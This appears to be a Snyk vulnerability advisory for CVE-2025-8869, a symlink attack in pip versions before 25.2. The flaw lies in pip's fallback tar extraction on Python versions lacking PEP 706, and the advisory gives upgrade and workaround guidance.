Symlink Attack Affecting pip package, versions [0,25.2)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-PIP-13045331
- published25 Sept 2025
- disclosed24 Sept 2025
- creditUnknown
Introduced: 24 Sep 2025
NewCVE-2025-8869 (opens in a new tab)How to fix?
Upgrade pip to version 25.2 or higher.
Overview
Affected versions of this package are vulnerable to Symlink Attack via _untar_without_filter when used with Python versions that do not implement PEP 706 (<3.9.17, <3.10.12, <3.11.4, or <3.12). An attacker can write files outside the target directory by enticing the user to install a tar archive containing malicious symbolic links that are not properly validated to ensure they point within the intended extraction directory.
Note: This is only exploitable through the fallback tar extraction logic used with non-PEP 706 compliant Python versions; when using a Python version that implements PEP 706, pip doesn't use the vulnerable fallback code.
Workaround
This vulnerability can be mitigated by upgrading to a Python version that implements PEP 706, e.g., Python >=3.9.17, >=3.10.12, >=3.11.4, or >=3.12, or manually inspecting source distributions before installation.